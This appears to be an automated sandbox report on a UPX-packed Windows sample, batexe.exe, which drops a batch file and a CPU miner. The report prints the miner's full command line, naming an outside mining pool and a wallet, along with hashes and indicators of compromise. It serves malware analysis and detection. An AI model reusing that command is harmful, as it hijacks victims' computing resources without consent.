73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
304s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 05:46

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3228	b2e.exe
2260	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4724-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4724 wrote to memory of 3228	4724	batexe.exe	74
PID 4724 wrote to memory of 3228	4724	batexe.exe	74
PID 4724 wrote to memory of 3228	4724	batexe.exe	74
PID 3228 wrote to memory of 372	3228	b2e.exe	75
PID 3228 wrote to memory of 372	3228	b2e.exe	75
PID 3228 wrote to memory of 372	3228	b2e.exe	75
PID 372 wrote to memory of 2260	372	cmd.exe	78
PID 372 wrote to memory of 2260	372	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4724
- C:\Users\Admin\AppData\Local\Temp\1400.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1400.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1400.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1B05.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1400.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\1400.tmp\b2e.exe

Filesize
997KB

MD5
4608de7dbb6723e0ab77771be4ac8a52

SHA1
c520c626804449eeb48c4ebe75493af405ba40ea

SHA256
89fec3e65058c45b2435f989fcedacd903f2175c934a237e0f5381267ceb8f3c

SHA512
85c8dbec20712bb316f0d39c3f16c16301c3c67a5ec2e56c4d9c26eacb47964409c7b43d56d1b706453394bb7f47a9bf232c5d7a4c03b16fd1384751e1929492

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B05.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
644KB

MD5
87aed7ff3360e39091a63700418697a4

SHA1
d37502dae1fc1e2b0ba0a0fc7b9b23d7f8c6b9c7

SHA256
2ef763f54123e245139d5d072aced8abdc84910d3698ca70e03ffbe56f4c75af

SHA512
f45e673d957444f31cd73271f09a312c7f5b4e0d962272bccc89bf4508e6a54f3d8b0a2b5f8a9a3bfe9b0c5df7bb342cb8f83d4b7834579aba9b274786d72683

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
866KB

MD5
495325a432576e5c9134881a88fc23d5

SHA1
06bea04e8b72ede33eb1d24762f43280d1f687fb

SHA256
16e33abb1f713b8c738cb599732eaa3b559078c5a37f67b8dcd662470c133fe3

SHA512
8c410240c22bf362a10b230557b65512f75b1a5407c18426ff5cee0e401d53ae11642ac565bd77fc3f6345c30947dc2a98432adb567b20b71c801f167514a64c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
580KB

MD5
ed2dd47fbbf6c7d59c507d735ded6fd6

SHA1
fe1a2b08b7f0053a3645f6e1a823a3e296a06e31

SHA256
54bc57091e432df4ee8c084a8e08c94b09e4e47d91ebca991e74998e5ce80403

SHA512
f6bb958edbb28960a78f6687251d194520977a1307b05fed509724595d8bfa17e85b0c3106b5bd6210185c0947fd7c29ba880a8ca9715602b4ddf71f431c4de4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1016KB

MD5
d06575d6030ca89620747344f1150195

SHA1
3db8fc03276b61261f9e0311797f86cd26d56492

SHA256
1e99d1d938e0388298eb932ddb72cc2b5a92f88d732d5a073ddaaad9cc64e8fb

SHA512
a932f18ab7c6121a0166f0e1b950e0edc5f2013c72486e0138005185e37f896be70f425a6304672ac3d2b9908baac175d933f6433d4415ba8c388a6743a7081a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
736KB

MD5
41a2df6c6a05ea6cf252519994ae42f1

SHA1
9f18597f92f3f9792feee208b643b857d64be31b

SHA256
2a109a611838015969e6e51b2e9fd63be3468cb681f7515fb1afa4779f548380

SHA512
c9931bde396a6118e1d7b05f8892e7eb35980ea256957bc52283de2c1e16333471f73327df7d1cdf747c13ab68ac78b115099cc14b69f67e76f366cf0193864a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
717KB

MD5
9dd5df41a8136490128eea07ee4f9cdf

SHA1
b38b0ae42d2233b916a25f8e1984847606f14a4c

SHA256
ff9c329a2f175d3eb35e9f7ea53dd184fb83e7ad98f62a353635f3399adbe46f

SHA512
bab13cc2f70a6a2d8948fb447bda0232ffb2e4875ffe9d2c2f5b1814c0d8385cd2b412ce730fbd06a661886b8ff6296c6059a1bd45bdcd07517873c48aa4bad4

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
25b57cd56e420ff5ff21764f65a4e6a6

SHA1
6397d6f984cb86369cf3f32d75a7b7f53938edc2

SHA256
5884e762235596af598f4fecc850e5111a29b132a83311f2bb334b14b944baf8

SHA512
7678244da1b5c6e1c287a63ab9b849c721eb38699e65a6e56c15d6254f7f844bb003043b6f81e95f67d3e3f780978d9adc15a53bbd6640c70a9bc1028d876311

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
795KB

MD5
2f36f5faf080902435ec5ec4b3d11e1c

SHA1
670fafd15f0c8bc92227c936c81167b20f1f88c2

SHA256
d63825b268618431f150aee62047e48928d7b33f846e1c0e0dca3b376d165b78

SHA512
c7857604abc29af34006ad3c1a7c00789eaf4cde0104575aac77a36e522e35a5ca12a0438230a84d126e1c4c15df2c952b6c1c50fce2f7a951bcd81dfb191aed

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
689KB

MD5
96477858c9ee129441d06dc09a1209ee

SHA1
4bf11eff55ebbf2b41f4e1d7e976a06c04f8497f

SHA256
2760c5e36a29792119722efa6311c17a63c51446f8d42b063e8a597ede4328fa

SHA512
393d918983c7156d511d1413a4384c0d1a2377c2a7a74fa60876b47cdbff8d4b4cd9918439b8fc80b22fb41e265f210a0ffddc5e3ba2a8dc9ff67afd7f7a96c5

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2260-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2260-42-0x00000000580D0000-0x0000000058168000-memory.dmp

Filesize
608KB

Download
memory/2260-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2260-44-0x0000000000F20000-0x00000000027D5000-memory.dmp

Filesize
24.7MB

Download
memory/2260-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3228-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3228-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4724-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download